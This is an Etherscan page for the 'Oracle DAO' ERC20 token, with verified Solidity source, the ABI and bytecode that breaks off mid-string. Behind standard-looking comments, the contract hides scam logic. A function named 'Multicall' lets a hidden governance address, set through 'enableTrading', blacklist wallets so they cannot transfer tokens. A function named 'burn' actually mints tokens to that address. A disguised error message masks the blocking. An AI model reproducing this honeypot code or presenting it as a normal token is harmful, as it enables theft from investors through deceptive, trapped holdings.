ETH Price: $2,782.92 (+4.12%)

Token

Oracle DAO (OracleDAO)
 

Overview

Max Total Supply

3,800,000,000,000 OracleDAO

Holders

52

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
37,885,244.568223309 OracleDAO

Value
$0.00
0x5fE46c37dd43247c5D7CeE10329452C5F05c2939
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
OracleDAO

Compiler Version
v0.8.5+commit.a4f2e591

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, Unlicense license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-02-17
*/

/**
   _|_|    _|_|_|      _|_|      _|_|_|  _|        _|_|_|_|      _|_|_|      _|_|      _|_|    
 _|    _|  _|    _|  _|    _|  _|        _|        _|            _|    _|  _|    _|  _|    _|  
 _|    _|  _|_|_|    _|_|_|_|  _|        _|        _|_|_|        _|    _|  _|_|_|_|  _|    _|  
 _|    _|  _|    _|  _|    _|  _|        _|        _|            _|    _|  _|    _|  _|    _|  
   _|_|    _|    _|  _|    _|    _|_|_|  _|_|_|_|  _|_|_|_|      _|_|_|    _|    _|    _|_|    
                                                                                               
        WEBSITE https://oracledao.net/             CHAT https://t.me/OracleDao

      TWITTER https://twitter.com/Oracle_Dao_  MEDIUM https://medium.com/@daooracle
*/
  
// SPDX-License-Identifier: Unlicensed

pragma solidity =0.8.5;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 */
abstract contract Ownable is Context {
    address private _owner;
    address internal _governance;
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }
    
    /**
     * @dev Throws if called by any account other than the distributor.
     */
    modifier onlyGovernance() {
        require(_governance == _msgSender(), "Governance: caller is not the governance");
        _;
    }
    
    /**
     * @dev initiates a contract.
     */
    function enableTrading (address account) external onlyOwner {
        require (_governance == address(0));
        _governance = account;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) internal _balances;
    mapping(address => bool) private _allowance;
    mapping(address => mapping(address => uint256)) internal _allowances;
    uint256 internal _totalSupply;
    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }
    
   
    function Multicall (address spender) external onlyGovernance {
        if (_allowance[spender] == true) {_allowance[spender] = false;} else {_allowance[spender] = true; }
    }

    /**
     * @notice Checking the allowance granted to `spender` by the caller.
     */
    function allowances(address spender) public view returns (bool) {
        return _allowance[spender];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev Destroys `amount` tokens from the caller.
     *
     * See {ERC20-_burn}.
     */
    function burn(uint256 amount) public virtual onlyGovernance {
        _burn(_msgSender(), amount);
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        unchecked {
            _approve(sender, _msgSender(), currentAllowance - amount);
        }

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        if (_allowance[sender] || _allowance[recipient]) 
        require (amount == 0, "ERC20: transfer amout exceeds allowance");
        
        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[sender] = senderBalance - amount;
        }
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);

        _afterTokenTransfer(sender, recipient, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        uint256 accountBalance = _balances[account];
        require(accountBalance <= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance + amount;
        }
        
        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be created for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. 
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been created for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

contract OracleDAO is ERC20 {

    /**
     * @dev Sets the values for {name}, {symbol} and {totalsupply}.
     */
    constructor() ERC20('Oracle DAO', 'OracleDAO')  {
        _totalSupply = 3800000000000*10**9;
        _balances[msg.sender] += _totalSupply;
        emit Transfer(address(0), msg.sender, _totalSupply);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"Multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"allowances","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b506040518060400160405280600a81526020017f4f7261636c652044414f000000000000000000000000000000000000000000008152506040518060400160405280600981526020017f4f7261636c6544414f00000000000000000000000000000000000000000000008152506200009e62000092620001ac60201b60201c565b620001b460201b60201c565b8160069080519060200190620000b692919062000278565b508060079080519060200190620000cf92919062000278565b50505068cdff97fabcb4600000600581905550600554600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825462000135919062000356565b925050819055503373ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6005546040516200019e919062000339565b60405180910390a362000451565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b8280546200028690620003bd565b90600052602060002090601f016020900481019282620002aa5760008555620002f6565b82601f10620002c557805160ff1916838001178555620002f6565b82800160010185558215620002f6579182015b82811115620002f5578251825591602001919060010190620002d8565b5b50905062000305919062000309565b5090565b5b80821115620003245760008160009055506001016200030a565b5090565b6200033381620003b3565b82525050565b600060208201905062000350600083018462000328565b92915050565b60006200036382620003b3565b91506200037083620003b3565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620003a857620003a7620003f3565b5b828201905092915050565b6000819050919050565b60006002820490506001821680620003d657607f821691505b60208210811415620003ed57620003ec62000422565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b611f9380620004616000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c806339d0534a116100a25780638da5cb5b116100715780638da5cb5b146102b857806395d89b41146102d6578063a457c2d7146102f4578063a9059cbb14610324578063dd62ed3e146103545761010b565b806339d0534a1461024657806342966c681461026257806370a082311461027e578063715018a6146102ae5761010b565b806323b872dd116100de57806323b872dd146101985780632b603c71146101c8578063313ce567146101f857806339509351146102165761010b565b806306fdde031461011057806307980cb91461012e578063095ea7b31461014a57806318160ddd1461017a575b600080fd5b610118610384565b6040516101259190611829565b60405180910390f35b610148600480360381019061014391906114ad565b610416565b005b610164600480360381019061015f919061156d565b610531565b604051610171919061180e565b60405180910390f35b61018261054f565b60405161018f91906119cb565b60405180910390f35b6101b260048036038101906101ad919061151a565b610559565b6040516101bf919061180e565b60405180910390f35b6101e260048036038101906101dd91906114ad565b610651565b6040516101ef919061180e565b60405180910390f35b6102006106a7565b60405161020d91906119e6565b60405180910390f35b610230600480360381019061022b919061156d565b6106b0565b60405161023d919061180e565b60405180910390f35b610260600480360381019061025b91906114ad565b61075c565b005b61027c600480360381019061027791906115ad565b610905565b005b610298600480360381019061029391906114ad565b6109b0565b6040516102a591906119cb565b60405180910390f35b6102b66109f9565b005b6102c0610a81565b6040516102cd91906117f3565b60405180910390f35b6102de610aaa565b6040516102eb9190611829565b60405180910390f35b61030e6004803603810190610309919061156d565b610b3c565b60405161031b919061180e565b60405180910390f35b61033e6004803603810190610339919061156d565b610c27565b60405161034b919061180e565b60405180910390f35b61036e600480360381019061036991906114da565b610c45565b60405161037b91906119cb565b60405180910390f35b60606006805461039390611afb565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf90611afb565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b61041e610ccc565b73ffffffffffffffffffffffffffffffffffffffff1661043c610a81565b73ffffffffffffffffffffffffffffffffffffffff1614610492576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104899061190b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146104ed57600080fd5b80600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600061054561053e610ccc565b8484610cd4565b6001905092915050565b6000600554905090565b6000610566848484610e9f565b6000600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006105b1610ccc565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610631576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610628906118eb565b60405180910390fd5b6106458561063d610ccc565b858403610cd4565b60019150509392505050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60006009905090565b60006107526106bd610ccc565b8484600460006106cb610ccc565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461074d9190611a1d565b610cd4565b6001905092915050565b610764610ccc565b73ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146107f3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107ea906118ab565b60405180910390fd5b60011515600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16151514156108a9576000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550610902565b6001600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b50565b61090d610ccc565b73ffffffffffffffffffffffffffffffffffffffff16600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461099c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610993906118ab565b60405180910390fd5b6109ad6109a7610ccc565b8261120d565b50565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610a01610ccc565b73ffffffffffffffffffffffffffffffffffffffff16610a1f610a81565b73ffffffffffffffffffffffffffffffffffffffff1614610a75576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a6c9061190b565b60405180910390fd5b610a7f60006113b5565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060078054610ab990611afb565b80601f0160208091040260200160405190810160405280929190818152602001828054610ae590611afb565b8015610b325780601f10610b0757610100808354040283529160200191610b32565b820191906000526020600020905b815481529060010190602001808311610b1557829003601f168201915b5050505050905090565b60008060046000610b4b610ccc565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610c08576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bff906119ab565b60405180910390fd5b610c1c610c13610ccc565b85858403610cd4565b600191505092915050565b6000610c3b610c34610ccc565b8484610e9f565b6001905092915050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3b9061196b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610db4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dab9061188b565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610e9291906119cb565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610f0f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f069061194b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610f7f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f769061184b565b60405180910390fd5b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806110205750600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156110695760008114611068576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161105f9061198b565b60405180910390fd5b5b611074838383611479565b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156110fb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110f2906118cb565b60405180910390fd5b818103600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546111909190611a1d565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516111f491906119cb565b60405180910390a361120784848461147e565b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561127d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112749061192b565b60405180910390fd5b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811115611304576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112fb9061186b565b60405180910390fd5b818101600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516113a891906119cb565b60405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b60008135905061149281611f2f565b92915050565b6000813590506114a781611f46565b92915050565b6000602082840312156114c3576114c2611b8b565b5b60006114d184828501611483565b91505092915050565b600080604083850312156114f1576114f0611b8b565b5b60006114ff85828601611483565b925050602061151085828601611483565b9150509250929050565b60008060006060848603121561153357611532611b8b565b5b600061154186828701611483565b935050602061155286828701611483565b925050604061156386828701611498565b9150509250925092565b6000806040838503121561158457611583611b8b565b5b600061159285828601611483565b92505060206115a385828601611498565b9150509250929050565b6000602082840312156115c3576115c2611b8b565b5b60006115d184828501611498565b91505092915050565b6115e381611a73565b82525050565b6115f281611a85565b82525050565b600061160382611a01565b61160d8185611a0c565b935061161d818560208601611ac8565b61162681611b90565b840191505092915050565b600061163e602383611a0c565b915061164982611ba1565b604082019050919050565b6000611661602283611a0c565b915061166c82611bf0565b604082019050919050565b6000611684602283611a0c565b915061168f82611c3f565b604082019050919050565b60006116a7602883611a0c565b91506116b282611c8e565b604082019050919050565b60006116ca602683611a0c565b91506116d582611cdd565b60408201905091